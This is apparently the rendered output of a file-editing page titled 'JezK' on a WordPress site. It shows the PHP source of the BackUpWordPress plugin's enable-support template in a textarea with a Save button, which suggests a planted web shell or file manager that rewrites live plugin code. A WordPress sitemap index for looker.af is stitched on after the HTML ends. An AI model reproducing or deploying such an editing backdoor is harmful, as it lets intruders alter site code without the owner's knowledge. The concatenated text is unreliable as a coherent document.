
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>JezK</title>
<style>
    body {
        font-family: Arial, sans-serif;
        margin: 0;
        padding: 0;
    }
    #container {
        max-width: 800px;
        margin: 20px auto;
        padding: 20px;
        border: 1px solid #ccc;
        border-radius: 5px;
        background-color: #f9f9f9;
    }
    h1 {
        text-align: center;
        color: #333;
    }
    h2 {
        margin-top: 30px;
        color: #555;
    }
    ul {
        list-style-type: none;
        padding: 0;
    }
    li {
        margin-bottom: 10px;
    }
    a {
        text-decoration: none;
        color: #007bff;
    }
    a:hover {
        text-decoration: underline;
    }
    form {
        margin-top: 20px;
    }
    input[type="text"], input[type="file"], input[type="submit"] {
        margin-bottom: 10px;
    }
    hr {
        border: 0;
        height: 1px;
        background-color: #ccc;
        margin-top: 20px;
        margin-bottom: 20px;
    }
</style>
</head>
<body>
<div id="container">
    <h1>JezK</h1>
    <h2>Edit File: enable-support.php</h2><form method="post"><textarea name="file_content" rows="10" cols="50">&lt;?php require_once HMBKP_PLUGIN_PATH . &#039;classes/class-requirements.php&#039;; ?&gt;

&lt;h2&gt;&lt;?php _e( &#039;Enable BackUpWordPress Support&#039;, &#039;backupwordpress&#039; ); ?&gt;&lt;/h2&gt;

&lt;p class=&quot;howto&quot;&gt;&lt;?php printf( __( &#039;BackUpWordPress uses %s to provide support. In addition to allowing you to send and receive messages we also send the following server information along with your requests:&#039;, &#039;backupwordpress&#039; ), &#039;&lt;a target=&quot;blank&quot; href=&quot;https://www.intercom.io&quot;&gt;Intercom&lt;/a&gt;&#039; ); ?&gt;&lt;/p&gt;

&lt;div class=&quot;server-info&quot;&gt;

&lt;?php foreach ( HM\BackUpWordPress\Requirements::get_requirement_groups() as $group ) : ?&gt;

	&lt;table class=&quot;fixed widefat&quot;&gt;

		&lt;thead&gt;
			&lt;tr&gt;
				&lt;th scope=&quot;col&quot; colspan=&quot;2&quot;&gt;&lt;?php echo esc_html( ucwords( $group ) ); ?&gt;&lt;/th&gt;
			&lt;/tr&gt;
		&lt;/thead&gt;

		&lt;tbody&gt;

		&lt;?php foreach ( HM\BackUpWordPress\Requirements::get_requirements( $group ) as $requirement ) : ?&gt;

			&lt;?php if ( ( is_string( $requirement-&gt;raw_result() ) &amp;&amp; strlen( $requirement-&gt;result() ) &lt; 20 ) || is_bool( $requirement-&gt;raw_result() ) ) { ?&gt;

			&lt;tr&gt;

				&lt;td&gt;&lt;?php echo esc_html( $requirement-&gt;name() ); ?&gt;&lt;/td&gt;

				&lt;td&gt;
					&lt;code&gt;&lt;?php echo esc_html( $requirement-&gt;result() ); ?&gt;&lt;/code&gt;
				&lt;/td&gt;

			&lt;/tr&gt;

			&lt;?php } else { ?&gt;

			&lt;tr&gt;

				&lt;td colspan=&quot;2&quot;&gt;
					&lt;?php echo esc_html( $requirement-&gt;name() ); ?&gt;
					&lt;pre&gt;&lt;?php echo esc_html( $requirement-&gt;result() ); ?&gt;&lt;/pre&gt;
				&lt;/td&gt;

			&lt;/tr&gt;

			&lt;?php } ?&gt;

		&lt;?php endforeach; ?&gt;

		&lt;/tbody&gt;

	&lt;/table&gt;

&lt;?php endforeach; ?&gt;

&lt;/div&gt;

&lt;p class=&quot;howto&quot;&gt;&lt;?php _e( &#039;You can disable support in the future by deactivating BackUpWordPress.&#039;, &#039;backupwordpress&#039; ); ?&gt;&lt;/p&gt;

&lt;a href=&quot;#&quot; class=&quot;button-secondary hmbkp-thickbox-close&quot;&gt;&lt;?php _e( &#039;No, thanks&#039;, &#039;backupwordpress&#039; ); ?&gt;&lt;/a&gt;
&lt;a href=&quot;&lt;?php echo esc_url( wp_nonce_url( add_query_arg( array( &#039;action&#039; =&gt; &#039;hmbkp_request_enable_support&#039; ), admin_url( &#039;admin-post.php&#039; ) ), &#039;hmbkp_enable_support&#039;, &#039;hmbkp_enable_support_nonce&#039; ) ); ?&gt;&quot; class=&quot;button-primary right&quot;&gt;&lt;?php _e( &#039;Yes, I want to enable support&#039;, &#039;backupwordpress&#039; ); ?&gt;&lt;/a&gt;
</textarea><br><input type="submit" value="Save"></form></div>
</body>
</html>

<?xml version="1.0" encoding="UTF-8"?>
<?xml-stylesheet type="text/xsl" href="https://looker.af/wp-sitemap-index.xsl" ?>
<sitemapindex xmlns="http://www.sitemaps.org/schemas/sitemap/0.9"><sitemap><loc>https://looker.af/wp-sitemap-posts-post-1.xml</loc></sitemap><sitemap><loc>https://looker.af/wp-sitemap-posts-page-1.xml</loc></sitemap><sitemap><loc>https://looker.af/wp-sitemap-taxonomies-category-1.xml</loc></sitemap><sitemap><loc>https://looker.af/wp-sitemap-users-1.xml</loc></sitemap></sitemapindex>
